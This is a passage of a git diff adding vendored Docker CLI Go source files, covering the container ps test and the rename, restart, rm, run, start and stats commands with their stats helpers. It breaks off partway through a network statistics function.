"bar", + "baz": "foo", + }, + }, + { + psOpts: &psOptions{ + all: true, + size: false, + last: 5, + filter: filters, + // With .Size, size should be true + format: "{{.Size}} {{.CreatedAt}} {{.Networks}}", + }, + expectedAll: true, + expectedSize: true, + expectedLimit: 5, + expectedFilters: map[string]string{ + "foo": "bar", + "baz": "foo", + }, + }, + { + psOpts: &psOptions{ + all: true, + size: false, + last: 5, + filter: filters, + // Without .Size, size should be false + format: "{{.CreatedAt}} {{.Networks}}", + }, + expectedAll: true, + expectedSize: false, + expectedLimit: 5, + expectedFilters: map[string]string{ + "foo": "bar", + "baz": "foo", + }, + }, + } + + for _, c := range contexts { + options, err := buildContainerListOptions(c.psOpts) + assert.NilError(t, err) + + assert.Equal(t, c.expectedAll, options.All) + assert.Equal(t, c.expectedSize, options.Size) + assert.Equal(t, c.expectedLimit, options.Limit) + assert.Equal(t, options.Filters.Len(), len(c.expectedFilters)) + + for k, v := range c.expectedFilters { + f := options.Filters + if !f.ExactMatch(k, v) { + t.Fatalf("Expected filter with key %s to be %s but got %s", k, v, f.Get(k)) + } + } + } +} diff --git a/vendor/github.com/docker/docker/cli/command/container/rename.go b/vendor/github.com/docker/docker/cli/command/container/rename.go new file mode 100644 index 0000000000..346fb7b3b9 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/rename.go @@ -0,0 +1,51 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type renameOptions struct { + oldName string + newName string +} + +// NewRenameCommand creates a new cobra.Command for `docker rename` +func NewRenameCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts renameOptions + + cmd := &cobra.Command{ + Use: "rename CONTAINER NEW_NAME", + Short: "Rename a container", + Args: cli.ExactArgs(2), + RunE: func(cmd *cobra.Command, args []string) error { + opts.oldName = args[0] + opts.newName = args[1] + return runRename(dockerCli, &opts) + }, + } + return cmd +} + +func runRename(dockerCli *command.DockerCli, opts *renameOptions) error { + ctx := context.Background() + + oldName := strings.TrimSpace(opts.oldName) + newName := strings.TrimSpace(opts.newName) + + if oldName == "" || newName == "" { + return fmt.Errorf("Error: Neither old nor new names may be empty") + } + + if err := dockerCli.Client().ContainerRename(ctx, oldName, newName); err != nil { + fmt.Fprintf(dockerCli.Err(), "%s\n", err) + return fmt.Errorf("Error: failed to rename container named %s", oldName) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/restart.go b/vendor/github.com/docker/docker/cli/command/container/restart.go new file mode 100644 index 0000000000..fc3ba93c84 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/restart.go @@ -0,0 +1,62 @@ +package container + +import ( + "fmt" + "strings" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type restartOptions struct { + nSeconds int + nSecondsChanged bool + + containers []string +} + +// NewRestartCommand creates a new cobra.Command for `docker restart` +func NewRestartCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts restartOptions + + cmd := &cobra.Command{ + Use: "restart [OPTIONS] CONTAINER [CONTAINER...]", + Short: "Restart one or more containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + opts.nSecondsChanged = cmd.Flags().Changed("time") + return runRestart(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.IntVarP(&opts.nSeconds, "time", "t", 10, "Seconds to wait for stop before killing the container") + return cmd +} + +func runRestart(dockerCli *command.DockerCli, opts *restartOptions) error { + ctx := context.Background() + var errs []string + var timeout *time.Duration + if opts.nSecondsChanged { + timeoutValue := time.Duration(opts.nSeconds) * time.Second + timeout = &timeoutValue + } + + for _, name := range opts.containers { + if err := dockerCli.Client().ContainerRestart(ctx, name, timeout); err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", name) + } + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/rm.go b/vendor/github.com/docker/docker/cli/command/container/rm.go new file mode 100644 index 0000000000..60724f194b --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/rm.go @@ -0,0 +1,73 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type rmOptions struct { + rmVolumes bool + rmLink bool + force bool + + containers []string +} + +// NewRmCommand creates a new cobra.Command for `docker rm` +func NewRmCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts rmOptions + + cmd := &cobra.Command{ + Use: "rm [OPTIONS] CONTAINER [CONTAINER...]", + Short: "Remove one or more containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + return runRm(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.rmVolumes, "volumes", "v", false, "Remove the volumes associated with the container") + flags.BoolVarP(&opts.rmLink, "link", "l", false, "Remove the specified link") + flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of a running container (uses SIGKILL)") + return cmd +} + +func runRm(dockerCli *command.DockerCli, opts *rmOptions) error { + ctx := context.Background() + + var errs []string + options := types.ContainerRemoveOptions{ + RemoveVolumes: opts.rmVolumes, + RemoveLinks: opts.rmLink, + Force: opts.force, + } + + errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, container string) error { + if container == "" { + return fmt.Errorf("Container name cannot be empty") + } + container = strings.Trim(container, "/") + return dockerCli.Client().ContainerRemove(ctx, container, options) + }) + + for _, name := range opts.containers { + if err := <-errChan; err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", name) + } + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/run.go b/vendor/github.com/docker/docker/cli/command/container/run.go new file mode 100644 index 0000000000..0fad93e688 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/run.go @@ -0,0 +1,285 @@ +package container + +import ( + "fmt" + "io" + "net/http/httputil" + "os" + "runtime" + "strings" + "syscall" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + opttypes "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/promise" + "github.com/docker/docker/pkg/signal" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/libnetwork/resolvconf/dns" + "github.com/spf13/cobra" + "github.com/spf13/pflag" +) + +type runOptions struct { + detach bool + sigProxy bool + name string + detachKeys string +} + +// NewRunCommand create a new `docker run` command +func NewRunCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts runOptions + var copts *runconfigopts.ContainerOptions + + cmd := &cobra.Command{ + Use: "run [OPTIONS] IMAGE [COMMAND] [ARG...]", + Short: "Run a command in a new container", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + copts.Image = args[0] + if len(args) > 1 { + copts.Args = args[1:] + } + return runRun(dockerCli, cmd.Flags(), &opts, copts) + }, + } + + flags := cmd.Flags() + flags.SetInterspersed(false) + + // These are flags not stored in Config/HostConfig + flags.BoolVarP(&opts.detach, "detach", "d", false, "Run container in background and print container ID") + flags.BoolVar(&opts.sigProxy, "sig-proxy", true, "Proxy received signals to the process") + flags.StringVar(&opts.name, "name", "", "Assign a name to the container") + flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container") + + // Add an explicit help that doesn't have a `-h` to prevent the conflict + // with hostname + flags.Bool("help", false, "Print usage") + + command.AddTrustedFlags(flags, true) + copts = runconfigopts.AddFlags(flags) + return cmd +} + +func runRun(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts *runOptions, copts *runconfigopts.ContainerOptions) error { + stdout, stderr, stdin := dockerCli.Out(), dockerCli.Err(), dockerCli.In() + client := dockerCli.Client() + // TODO: pass this as an argument + cmdPath := "run" + + var ( + flAttach *opttypes.ListOpts + ErrConflictAttachDetach = fmt.Errorf("Conflicting options: -a and -d") + ErrConflictRestartPolicyAndAutoRemove = fmt.Errorf("Conflicting options: --restart and --rm") + ) + + config, hostConfig, networkingConfig, err := runconfigopts.Parse(flags, copts) + + // just in case the Parse does not exit + if err != nil { + reportError(stderr, cmdPath, err.Error(), true) + return cli.StatusError{StatusCode: 125} + } + + if hostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() { + return ErrConflictRestartPolicyAndAutoRemove + } + if hostConfig.OomKillDisable != nil && *hostConfig.OomKillDisable && hostConfig.Memory == 0 { + fmt.Fprintf(stderr, "WARNING: Disabling the OOM killer on containers without setting a '-m/--memory' limit may be dangerous.\n") + } + + if len(hostConfig.DNS) > 0 { + // check the DNS settings passed via --dns against + // localhost regexp to warn if they are trying to + // set a DNS to a localhost address + for _, dnsIP := range hostConfig.DNS { + if dns.IsLocalhost(dnsIP) { + fmt.Fprintf(stderr, "WARNING: Localhost DNS setting (--dns=%s) may fail in containers.\n", dnsIP) + break + } + } + } + + config.ArgsEscaped = false + + if !opts.detach { + if err := dockerCli.In().CheckTty(config.AttachStdin, config.Tty); err != nil { + return err + } + } else { + if fl := flags.Lookup("attach"); fl != nil { + flAttach = fl.Value.(*opttypes.ListOpts) + if flAttach.Len() != 0 { + return ErrConflictAttachDetach + } + } + + config.AttachStdin = false + config.AttachStdout = false + config.AttachStderr = false + config.StdinOnce = false + } + + // Disable sigProxy when in TTY mode + if config.Tty { + opts.sigProxy = false + } + + // Telling the Windows daemon the initial size of the tty during start makes + // a far better user experience rather than relying on subsequent resizes + // to cause things to catch up. + if runtime.GOOS == "windows" { + hostConfig.ConsoleSize[0], hostConfig.ConsoleSize[1] = dockerCli.Out().GetTtySize() + } + + ctx, cancelFun := context.WithCancel(context.Background()) + + createResponse, err := createContainer(ctx, dockerCli, config, hostConfig, networkingConfig, hostConfig.ContainerIDFile, opts.name) + if err != nil { + reportError(stderr, cmdPath, err.Error(), true) + return runStartContainerErr(err) + } + if opts.sigProxy { + sigc := ForwardAllSignals(ctx, dockerCli, createResponse.ID) + defer signal.StopCatch(sigc) + } + var ( + waitDisplayID chan struct{} + errCh chan error + ) + if !config.AttachStdout && !config.AttachStderr { + // Make this asynchronous to allow the client to write to stdin before having to read the ID + waitDisplayID = make(chan struct{}) + go func() { + defer close(waitDisplayID) + fmt.Fprintf(stdout, "%s\n", createResponse.ID) + }() + } + attach := config.AttachStdin || config.AttachStdout || config.AttachStderr + if attach { + var ( + out, cerr io.Writer + in io.ReadCloser + ) + if config.AttachStdin { + in = stdin + } + if config.AttachStdout { + out = stdout + } + if config.AttachStderr { + if config.Tty { + cerr = stdout + } else { + cerr = stderr + } + } + + if opts.detachKeys != "" { + dockerCli.ConfigFile().DetachKeys = opts.detachKeys + } + + options := types.ContainerAttachOptions{ + Stream: true, + Stdin: config.AttachStdin, + Stdout: config.AttachStdout, + Stderr: config.AttachStderr, + DetachKeys: dockerCli.ConfigFile().DetachKeys, + } + + resp, errAttach := client.ContainerAttach(ctx, createResponse.ID, options) + if errAttach != nil && errAttach != httputil.ErrPersistEOF { + // ContainerAttach returns an ErrPersistEOF (connection closed) + // means server met an error and put it in Hijacked connection + // keep the error and read detailed error message from hijacked connection later + return errAttach + } + defer resp.Close() + + errCh = promise.Go(func() error { + errHijack := holdHijackedConnection(ctx, dockerCli, config.Tty, in, out, cerr, resp) + if errHijack == nil { + return errAttach + } + return errHijack + }) + } + + statusChan := waitExitOrRemoved(ctx, dockerCli, createResponse.ID, hostConfig.AutoRemove) + + //start the container + if err := client.ContainerStart(ctx, createResponse.ID, types.ContainerStartOptions{}); err != nil { + // If we have holdHijackedConnection, we should notify + // holdHijackedConnection we are going to exit and wait + // to avoid the terminal are not restored. + if attach { + cancelFun() + <-errCh + } + + reportError(stderr, cmdPath, err.Error(), false) + if hostConfig.AutoRemove { + // wait container to be removed + <-statusChan + } + return runStartContainerErr(err) + } + + if (config.AttachStdin || config.AttachStdout || config.AttachStderr) && config.Tty && dockerCli.Out().IsTerminal() { + if err := MonitorTtySize(ctx, dockerCli, createResponse.ID, false); err != nil { + fmt.Fprintf(stderr, "Error monitoring TTY size: %s\n", err) + } + } + + if errCh != nil { + if err := <-errCh; err != nil { + logrus.Debugf("Error hijack: %s", err) + return err + } + } + + // Detached mode: wait for the id to be displayed and return. + if !config.AttachStdout && !config.AttachStderr { + // Detached mode + <-waitDisplayID + return nil + } + + status := <-statusChan + if status != 0 { + return cli.StatusError{StatusCode: status} + } + return nil +} + +// reportError is a utility method that prints a user-friendly message +// containing the error that occurred during parsing and a suggestion to get help +func reportError(stderr io.Writer, name string, str string, withHelp bool) { + if withHelp { + str += ".\nSee '" + os.Args[0] + " " + name + " --help'" + } + fmt.Fprintf(stderr, "%s: %s.\n", os.Args[0], str) +} + +// if container start fails with 'not found'/'no such' error, return 127 +// if container start fails with 'permission denied' error, return 126 +// return 125 for generic docker daemon failures +func runStartContainerErr(err error) error { + trimmedErr := strings.TrimPrefix(err.Error(), "Error response from daemon: ") + statusError := cli.StatusError{StatusCode: 125} + if strings.Contains(trimmedErr, "executable file not found") || + strings.Contains(trimmedErr, "no such file or directory") || + strings.Contains(trimmedErr, "system cannot find the file specified") { + statusError = cli.StatusError{StatusCode: 127} + } else if strings.Contains(trimmedErr, syscall.EACCES.Error()) { + statusError = cli.StatusError{StatusCode: 126} + } + + return statusError +} diff --git a/vendor/github.com/docker/docker/cli/command/container/start.go b/vendor/github.com/docker/docker/cli/command/container/start.go new file mode 100644 index 0000000000..3521a41949 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/start.go @@ -0,0 +1,179 @@ +package container + +import ( + "fmt" + "io" + "net/http/httputil" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/pkg/promise" + "github.com/docker/docker/pkg/signal" + "github.com/spf13/cobra" +) + +type startOptions struct { + attach bool + openStdin bool + detachKeys string + checkpoint string + checkpointDir string + + containers []string +} + +// NewStartCommand creates a new cobra.Command for `docker start` +func NewStartCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts startOptions + + cmd := &cobra.Command{ + Use: "start [OPTIONS] CONTAINER [CONTAINER...]", + Short: "Start one or more stopped containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + return runStart(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.attach, "attach", "a", false, "Attach STDOUT/STDERR and forward signals") + flags.BoolVarP(&opts.openStdin, "interactive", "i", false, "Attach container's STDIN") + flags.StringVar(&opts.detachKeys, "detach-keys", "", "Override the key sequence for detaching a container") + + flags.StringVar(&opts.checkpoint, "checkpoint", "", "Restore from this checkpoint") + flags.SetAnnotation("checkpoint", "experimental", nil) + flags.StringVar(&opts.checkpointDir, "checkpoint-dir", "", "Use a custom checkpoint storage directory") + flags.SetAnnotation("checkpoint-dir", "experimental", nil) + return cmd +} + +func runStart(dockerCli *command.DockerCli, opts *startOptions) error { + ctx, cancelFun := context.WithCancel(context.Background()) + + if opts.attach || opts.openStdin { + // We're going to attach to a container. + // 1. Ensure we only have one container. + if len(opts.containers) > 1 { + return fmt.Errorf("You cannot start and attach multiple containers at once.") + } + + // 2. Attach to the container. + container := opts.containers[0] + c, err := dockerCli.Client().ContainerInspect(ctx, container) + if err != nil { + return err + } + + // We always use c.ID instead of container to maintain consistency during `docker start` + if !c.Config.Tty { + sigc := ForwardAllSignals(ctx, dockerCli, c.ID) + defer signal.StopCatch(sigc) + } + + if opts.detachKeys != "" { + dockerCli.ConfigFile().DetachKeys = opts.detachKeys + } + + options := types.ContainerAttachOptions{ + Stream: true, + Stdin: opts.openStdin && c.Config.OpenStdin, + Stdout: true, + Stderr: true, + DetachKeys: dockerCli.ConfigFile().DetachKeys, + } + + var in io.ReadCloser + + if options.Stdin { + in = dockerCli.In() + } + + resp, errAttach := dockerCli.Client().ContainerAttach(ctx, c.ID, options) + if errAttach != nil && errAttach != httputil.ErrPersistEOF { + // ContainerAttach return an ErrPersistEOF (connection closed) + // means server met an error and already put it in Hijacked connection, + // we would keep the error and read the detailed error message from hijacked connection + return errAttach + } + defer resp.Close() + cErr := promise.Go(func() error { + errHijack := holdHijackedConnection(ctx, dockerCli, c.Config.Tty, in, dockerCli.Out(), dockerCli.Err(), resp) + if errHijack == nil { + return errAttach + } + return errHijack + }) + + // 3. We should open a channel for receiving status code of the container + // no matter it's detached, removed on daemon side(--rm) or exit normally. + statusChan := waitExitOrRemoved(ctx, dockerCli, c.ID, c.HostConfig.AutoRemove) + startOptions := types.ContainerStartOptions{ + CheckpointID: opts.checkpoint, + CheckpointDir: opts.checkpointDir, + } + + // 4. Start the container. + if err := dockerCli.Client().ContainerStart(ctx, c.ID, startOptions); err != nil { + cancelFun() + <-cErr + if c.HostConfig.AutoRemove { + // wait container to be removed + <-statusChan + } + return err + } + + // 5. Wait for attachment to break. + if c.Config.Tty && dockerCli.Out().IsTerminal() { + if err := MonitorTtySize(ctx, dockerCli, c.ID, false); err != nil { + fmt.Fprintf(dockerCli.Err(), "Error monitoring TTY size: %s\n", err) + } + } + if attchErr := <-cErr; attchErr != nil { + return attchErr + } + + if status := <-statusChan; status != 0 { + return cli.StatusError{StatusCode: status} + } + } else if opts.checkpoint != "" { + if len(opts.containers) > 1 { + return fmt.Errorf("You cannot restore multiple containers at once.") + } + container := opts.containers[0] + startOptions := types.ContainerStartOptions{ + CheckpointID: opts.checkpoint, + CheckpointDir: opts.checkpointDir, + } + return dockerCli.Client().ContainerStart(ctx, container, startOptions) + + } else { + // We're not going to attach to anything. + // Start as many containers as we want. + return startContainersWithoutAttachments(ctx, dockerCli, opts.containers) + } + + return nil +} + +func startContainersWithoutAttachments(ctx context.Context, dockerCli *command.DockerCli, containers []string) error { + var failedContainers []string + for _, container := range containers { + if err := dockerCli.Client().ContainerStart(ctx, container, types.ContainerStartOptions{}); err != nil { + fmt.Fprintf(dockerCli.Err(), "%s\n", err) + failedContainers = append(failedContainers, container) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", container) + } + } + + if len(failedContainers) > 0 { + return fmt.Errorf("Error: failed to start containers: %v", strings.Join(failedContainers, ", ")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/stats.go b/vendor/github.com/docker/docker/cli/command/container/stats.go new file mode 100644 index 0000000000..12d5c68522 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/stats.go @@ -0,0 +1,243 @@ +package container + +import ( + "fmt" + "io" + "strings" + "sync" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/formatter" + "github.com/spf13/cobra" +) + +type statsOptions struct { + all bool + noStream bool + format string + containers []string +} + +// NewStatsCommand creates a new cobra.Command for `docker stats` +func NewStatsCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts statsOptions + + cmd := &cobra.Command{ + Use: "stats [OPTIONS] [CONTAINER...]", + Short: "Display a live stream of container(s) resource usage statistics", + Args: cli.RequiresMinArgs(0), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + return runStats(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.all, "all", "a", false, "Show all containers (default shows just running)") + flags.BoolVar(&opts.noStream, "no-stream", false, "Disable streaming stats and only pull the first result") + flags.StringVar(&opts.format, "format", "", "Pretty-print images using a Go template") + return cmd +} + +// runStats displays a live stream of resource usage statistics for one or more containers. +// This shows real-time information on CPU usage, memory usage, and network I/O. +func runStats(dockerCli *command.DockerCli, opts *statsOptions) error { + showAll := len(opts.containers) == 0 + closeChan := make(chan error) + + ctx := context.Background() + + // monitorContainerEvents watches for container creation and removal (only + // used when calling `docker stats` without arguments). + monitorContainerEvents := func(started chan<- struct{}, c chan events.Message) { + f := filters.NewArgs() + f.Add("type", "container") + options := types.EventsOptions{ + Filters: f, + } + + eventq, errq := dockerCli.Client().Events(ctx, options) + + // Whether we successfully subscribed to eventq or not, we can now + // unblock the main goroutine. + close(started) + + for { + select { + case event := <-eventq: + c <- event + case err := <-errq: + closeChan <- err + return + } + } + } + + // Get the daemonOSType if not set already + if daemonOSType == "" { + svctx := context.Background() + sv, err := dockerCli.Client().ServerVersion(svctx) + if err != nil { + return err + } + daemonOSType = sv.Os + } + + // waitFirst is a WaitGroup to wait first stat data's reach for each container + waitFirst := &sync.WaitGroup{} + + cStats := stats{} + // getContainerList simulates creation event for all previously existing + // containers (only used when calling `docker stats` without arguments). + getContainerList := func() { + options := types.ContainerListOptions{ + All: opts.all, + } + cs, err := dockerCli.Client().ContainerList(ctx, options) + if err != nil { + closeChan <- err + } + for _, container := range cs { + s := formatter.NewContainerStats(container.ID[:12], daemonOSType) + if cStats.add(s) { + waitFirst.Add(1) + go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) + } + } + } + + if showAll { + // If no names were specified, start a long running goroutine which + // monitors container events. We make sure we're subscribed before + // retrieving the list of running containers to avoid a race where we + // would "miss" a creation. + started := make(chan struct{}) + eh := command.InitEventHandler() + eh.Handle("create", func(e events.Message) { + if opts.all { + s := formatter.NewContainerStats(e.ID[:12], daemonOSType) + if cStats.add(s) { + waitFirst.Add(1) + go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) + } + } + }) + + eh.Handle("start", func(e events.Message) { + s := formatter.NewContainerStats(e.ID[:12], daemonOSType) + if cStats.add(s) { + waitFirst.Add(1) + go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) + } + }) + + eh.Handle("die", func(e events.Message) { + if !opts.all { + cStats.remove(e.ID[:12]) + } + }) + + eventChan := make(chan events.Message) + go eh.Watch(eventChan) + go monitorContainerEvents(started, eventChan) + defer close(eventChan) + <-started + + // Start a short-lived goroutine to retrieve the initial list of + // containers. + getContainerList() + } else { + // Artificially send creation events for the containers we were asked to + // monitor (same code path than we use when monitoring all containers). + for _, name := range opts.containers { + s := formatter.NewContainerStats(name, daemonOSType) + if cStats.add(s) { + waitFirst.Add(1) + go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst) + } + } + + // We don't expect any asynchronous errors: closeChan can be closed. + close(closeChan) + + // Do a quick pause to detect any error with the provided list of + // container names. + time.Sleep(1500 * time.Millisecond) + var errs []string + cStats.mu.Lock() + for _, c := range cStats.cs { + cErr := c.GetError() + if cErr != nil { + errs = append(errs, fmt.Sprintf("%s: %v", c.Name, cErr)) + } + } + cStats.mu.Unlock() + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, ", ")) + } + } + + // before print to screen, make sure each container get at least one valid stat data + waitFirst.Wait() + format := opts.format + if len(format) == 0 { + if len(dockerCli.ConfigFile().StatsFormat) > 0 { + format = dockerCli.ConfigFile().StatsFormat + } else { + format = formatter.TableFormatKey + } + } + statsCtx := formatter.Context{ + Output: dockerCli.Out(), + Format: formatter.NewStatsFormat(format, daemonOSType), + } + cleanScreen := func() { + if !opts.noStream { + fmt.Fprint(dockerCli.Out(), "\033[2J") + fmt.Fprint(dockerCli.Out(), "\033[H") + } + } + + var err error + for range time.Tick(500 * time.Millisecond) { + cleanScreen() + ccstats := []formatter.StatsEntry{} + cStats.mu.Lock() + for _, c := range cStats.cs { + ccstats = append(ccstats, c.GetStatistics()) + } + cStats.mu.Unlock() + if err = formatter.ContainerStatsWrite(statsCtx, ccstats); err != nil { + break + } + if len(cStats.cs) == 0 && !showAll { + break + } + if opts.noStream { + break + } + select { + case err, ok := <-closeChan: + if ok { + if err != nil { + // this is suppressing "unexpected EOF" in the cli when the + // daemon restarts so it shutdowns cleanly + if err == io.ErrUnexpectedEOF { + return nil + } + return err + } + } + default: + // just skip + } + } + return err +} diff --git a/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go b/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go new file mode 100644 index 0000000000..4b57e3fe05 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go @@ -0,0 +1,226 @@ +package container + +import ( + "encoding/json" + "errors" + "io" + "strings" + "sync" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli/command/formatter" + "github.com/docker/docker/client" + "golang.org/x/net/context" +) + +type stats struct { + ostype string + mu sync.Mutex + cs []*formatter.ContainerStats +} + +// daemonOSType is set once we have at least one stat for a container +// from the daemon. It is used to ensure we print the right header based +// on the daemon platform. +var daemonOSType string + +func (s *stats) add(cs *formatter.ContainerStats) bool { + s.mu.Lock() + defer s.mu.Unlock() + if _, exists := s.isKnownContainer(cs.Container); !exists { + s.cs = append(s.cs, cs) + return true + } + return false +} + +func (s *stats) remove(id string) { + s.mu.Lock() + if i, exists := s.isKnownContainer(id); exists { + s.cs = append(s.cs[:i], s.cs[i+1:]...) + } + s.mu.Unlock() +} + +func (s *stats) isKnownContainer(cid string) (int, bool) { + for i, c := range s.cs { + if c.Container == cid { + return i, true + } + } + return -1, false +} + +func collect(ctx context.Context, s *formatter.ContainerStats, cli client.APIClient, streamStats bool, waitFirst *sync.WaitGroup) { + logrus.Debugf("collecting stats for %s", s.Container) + var ( + getFirst bool + previousCPU uint64 + previousSystem uint64 + u = make(chan error, 1) + ) + + defer func() { + // if error happens and we get nothing of stats, release wait group whatever + if !getFirst { + getFirst = true + waitFirst.Done() + } + }() + + response, err := cli.ContainerStats(ctx, s.Container, streamStats) + if err != nil { + s.SetError(err) + return + } + defer response.Body.Close() + + dec := json.NewDecoder(response.Body) + go func() { + for { + var ( + v *types.StatsJSON + memPercent = 0.0 + cpuPercent = 0.0 + blkRead, blkWrite uint64 // Only used on Linux + mem = 0.0 + memLimit = 0.0 + memPerc = 0.0 + pidsStatsCurrent uint64 + ) + + if err := dec.Decode(&v); err != nil { + dec = json.NewDecoder(io.MultiReader(dec.Buffered(), response.Body)) + u <- err + if err == io.EOF { + break + } + time.Sleep(100 * time.Millisecond) + continue + } + + daemonOSType = response.OSType + + if daemonOSType != "windows" { + // MemoryStats.Limit will never be 0 unless the container is not running and we haven't + // got any data from cgroup + if v.MemoryStats.Limit != 0 { + memPercent = float64(v.MemoryStats.Usage) / float64(v.MemoryStats.Limit) * 100.0 + } + previousCPU = v.PreCPUStats.CPUUsage.TotalUsage + previousSystem = v.PreCPUStats.SystemUsage + cpuPercent = calculateCPUPercentUnix(previousCPU, previousSystem, v) + blkRead, blkWrite = calculateBlockIO(v.BlkioStats) + mem = float64(v.MemoryStats.Usage) + memLimit = float64(v.MemoryStats.Limit) + memPerc = memPercent + pidsStatsCurrent = v.PidsStats.Current + } else { + cpuPercent = calculateCPUPercentWindows(v) + blkRead = v.StorageStats.ReadSizeBytes + blkWrite = v.StorageStats.WriteSizeBytes + mem = float64(v.MemoryStats.PrivateWorkingSet) + } + netRx, netTx := calculateNetwork(v.Networks) + s.SetStatistics(formatter.StatsEntry{ + Name: v.Name, + ID: v.ID, + CPUPercentage: cpuPercent, + Memory: mem, + MemoryPercentage: memPerc, + MemoryLimit: memLimit, + NetworkRx: netRx, + NetworkTx: netTx, + BlockRead: float64(blkRead), + BlockWrite: float64(blkWrite), + PidsCurrent: pidsStatsCurrent, + }) + u <- nil + if !streamStats { + return + } + } + }() + for { + select { + case <-time.After(2 * time.Second): + // zero out the values if we have not received an update within + // the specified duration. + s.SetErrorAndReset(errors.New("timeout waiting for stats")) + // if this is the first stat you get, release WaitGroup + if !getFirst { + getFirst = true + waitFirst.Done() + } + case err := <-u: + if err != nil { + s.SetError(err) + continue + } + s.SetError(nil) + // if this is the first stat you get, release WaitGroup + if !getFirst { + getFirst = true + waitFirst.Done() + } + } + if !streamStats { + return + } + } +} + +func calculateCPUPercentUnix(previousCPU, previousSystem uint64, v *types.StatsJSON) float64 { + var ( + cpuPercent = 0.0 + // calculate the change for the cpu usage of the container in between readings + cpuDelta = float64(v.CPUStats.CPUUsage.TotalUsage) - float64(previousCPU) + // calculate the change for the entire system between readings + systemDelta = float64(v.CPUStats.SystemUsage) - float64(previousSystem) + ) + + if systemDelta > 0.0 && cpuDelta > 0.0 { + cpuPercent = (cpuDelta / systemDelta) * float64(len(v.CPUStats.CPUUsage.PercpuUsage)) * 100.0 + } + return cpuPercent +} + +func calculateCPUPercentWindows(v *types.StatsJSON) float64 { + // Max number of 100ns intervals between the previous time read and now + possIntervals := uint64(v.Read.Sub(v.PreRead).Nanoseconds()) // Start with number of ns intervals + possIntervals /= 100 // Convert to number of 100ns intervals + possIntervals *= uint64(v.NumProcs) // Multiple by the number of processors + + // Intervals used + intervalsUsed := v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage + + // Percentage avoiding divide-by-zero + if possIntervals > 0 { + return float64(intervalsUsed) / float64(possIntervals) * 100.0 + } + return 0.00 +} + +func calculateBlockIO(blkio types.BlkioStats) (blkRead uint64, blkWrite uint64) { + for _, bioEntry := range blkio.IoServiceBytesRecursive { + switch strings.ToLower(bioEntry.Op) { + case "read": + blkRead = blkRead + bioEntry.Value + case "write": + blkWrite = blkWrite + bioEntry.Value + } + } + return +} + +func calculateNetwork(network map[string]types.NetworkStats) (float64, float64) { + var rx, tx float64 + + for _, v := range network { + rx += float64(v.RxBytes) 